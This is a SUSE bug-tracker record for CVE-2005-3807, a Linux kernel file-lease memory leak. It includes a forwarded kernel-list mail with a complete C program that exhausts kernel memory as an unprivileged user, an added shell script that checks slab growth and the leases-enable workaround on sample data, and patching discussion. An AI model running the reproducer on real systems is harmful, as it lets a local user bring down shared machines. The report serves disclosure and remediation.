Bug 133803 (CVE-2005-3807)

Summary: VUL-0: CVE-2005-3807: kernel: file leases lead to oom
Product: [Novell Products] SUSE Security Incidents
Component: Incidents
Status: RESOLVED FIXED
Severity: Normal
Priority: P5 - None
Version: unspecified
Target Milestone: ---
Hardware: Other
OS: Other
Whiteboard: CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Found By: Other
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---
Reporter: Ludwig Nussel <lnussel>
Assignee: Lars Marowsky-Bree <lmb>
QA Contact: Security Team bot <security-team>
CC: security-team

Description Ludwig Nussel 2005-11-15 08:05:07 UTC
We received the following report via vendor-sec.
The issue is public.

Date: Mon, 14 Nov 2005 10:43:29 -0800
From: Chris Wright <chrisw@osdl.org>
To: vendor-sec@lst.de
Subject: [vendor-sec] [avi@argo.co.il: local denial-of-service with file leases]

Memory leak easily triggered by normal samba usage.  Fix:

http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e;hp=9e6c67fd2716720d9029d38ea25884efcfdedeb6

thanks,
-chris

----- Forwarded message from Avi Kivity <avi@argo.co.il> -----

Date: 	Thu, 10 Nov 2005 19:00:46 +0200
From: Avi Kivity <avi@argo.co.il>
To: linux-kernel <linux-kernel@vger.kernel.org>
Subject: local denial-of-service with file leases
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)

The following program will oom the 2.6.14.1 kernel, running as an
ordinary user:

#define _GNU_SOURCE          /* F_SETLEASE is a Linux extension in <fcntl.h> */
#include <fcntl.h>
#include <stdio.h>           /* perror() */
#include <stdlib.h>
#include <unistd.h>

int main(int ac, char **av)
{
   /* Open our own executable read-only: a read lease (F_RDLCK) only needs
      a file the caller owns, opened for reading, so no privilege is required. */
   char *fname = av[0];
   int fd = open(fname, O_RDONLY);
   int r;

   if (fd == -1) {
       perror("open");
       exit(1);
   }

   /* Take and release a read lease forever; on an affected kernel every
      cycle leaks a fasync entry until the machine runs out of memory. */
   while (1) {
       r = fcntl(fd, F_SETLEASE, F_RDLCK);
       if (r == -1) {
           perror("F_SETLEASE, F_RDLCK");
           exit(1);
       }
       r = fcntl(fd, F_SETLEASE, F_UNLCK);
       if (r == -1) {
           perror("F_SETLEASE, F_UNLCK");
           exit(1);
       }
   }
   return 0;
}

It will suck all available memory into fasync_cache, causing an OOM. A
workaround is to set fs.leases-enable to 0.

This has already been reported to lkml[1] and fedora[2], with no effect.

[1] http://www.ussg.iu.edu/hypermail/linux/kernel/0510.2/1589.html
[2] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=172691


----- End forwarded message -----
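A way to confirm the workaround from the report and to watch the leak from the outside, added here as an example and not part of the bug report or of any SUSE tooling. It reads the two counters that matter for this bug: the fs.leases-enable sysctl (/proc/sys/fs/leases-enable) and the fasync_cache line of /proc/slabinfo. The slabinfo snapshots and the sysctl value it operates on are constructed sample data, not real output, and the function names are this example's own.

```shell
#!/bin/sh
# Added example, not from the bug report. Checks whether the
# fs.leases-enable workaround is in place and how many objects fasync_cache
# holds, which grows without bound on an affected kernel while the
# reproducer loop runs.

# Active object count of one slab cache, from /proc/slabinfo-formatted text
# on stdin. Columns in slabinfo 2.x: name active_objs num_objs objsize ...
# Exit status 1 if the cache is not listed.
slab_active_objs() {
    awk -v name="$1" '
        $1 == name { print $2; found = 1 }
        END        { if (!found) exit 1 }'
}

# Exit status 0 if the sysctl file holds 0 (leases disabled, the workaround
# from the report), 1 otherwise. Takes the file path so it can run on a sample.
leases_disabled() {
    [ "$(cat "$1")" = "0" ]
}

# Growth of fasync_cache between two slabinfo snapshots (file paths).
fasync_growth() {
    before=$(slab_active_objs fasync_cache < "$1") || return 1
    after=$(slab_active_objs fasync_cache < "$2") || return 1
    echo $((after - before))
}

# --- constructed sample data (not real output) -------------------------
SAMPLE_BEFORE=$(mktemp)
SAMPLE_AFTER=$(mktemp)
SAMPLE_SYSCTL=$(mktemp)
trap 'rm -f "$SAMPLE_BEFORE" "$SAMPLE_AFTER" "$SAMPLE_SYSCTL"' EXIT

# Idle host.
cat > "$SAMPLE_BEFORE" <<'EOF'
slabinfo - version: 2.1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
fasync_cache          12         59         64         59          1 : tunables  120   60    8 : slabdata      1      1      0
dentry_cache       21000      21505        144         27          1 : tunables  120   60    8 : slabdata    797    797      0
EOF

# Same host a while into the F_SETLEASE loop: fasync_cache has ballooned.
cat > "$SAMPLE_AFTER" <<'EOF'
slabinfo - version: 2.1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
fasync_cache     1048576    1048607         64         59          1 : tunables  120   60    8 : slabdata  17773  17773      0
dentry_cache       21000      21505        144         27          1 : tunables  120   60    8 : slabdata    797    797      0
EOF

# What /proc/sys/fs/leases-enable reads after "sysctl -w fs.leases-enable=0".
printf '0\n' > "$SAMPLE_SYSCTL"

echo "fasync_cache growth in sample: $(fasync_growth "$SAMPLE_BEFORE" "$SAMPLE_AFTER")"
if leases_disabled "$SAMPLE_SYSCTL"; then
    echo "sample sysctl: leases disabled (workaround applied)"
fi

# On a live host (reading /proc/slabinfo normally needs root):
#   sysctl -w fs.leases-enable=0
#   leases_disabled /proc/sys/fs/leases-enable && echo workaround active
#   slab_active_objs fasync_cache < /proc/slabinfo
```

Note that fs.leases-enable=0 disables leases for every process on the host, which breaks Samba's oplock support; it is a stop-gap until the fixed kernel is installed, not a permanent setting.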
Comment 1 Lars Marowsky-Bree 2005-11-15 08:30:18 UTC
Ludwig, is it enough to fix this bug for HEAD?
Comment 2 Ludwig Nussel 2005-11-15 08:39:56 UTC
Well, if "normal" (i.e. not even malicious) samba usage can kill your shiny suse linux server, I vote for fixing it in all affected kernels.
Comment 3 Lars Marowsky-Bree 2005-11-15 09:14:32 UTC
SLES9, SL92 are _not_ affected.

Committed to SL93, SL100, HEAD.
Comment 4 Marcus Meissner 2005-11-28 06:35:49 UTC
======================================================
Name: CVE-2005-3807
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3807
Reference: CONFIRM:http://kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=dc15ae14e97ee9d5ed740cbb0b94996076d8b37e

Memory leak in the VFS file lease handling in locks.c in Linux kernels
2.6.10 to 2.6.15 allows local users to cause a denial of service
(memory exhaustion) via certain Samba activities that cause an fasync
entry to be re-allocated after the fasync queue has already been
cleaned.
Comment 5 Thomas Biege 2009-10-13 20:35:08 UTC
CVE-2005-3807: CVSS v2 Base Score: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)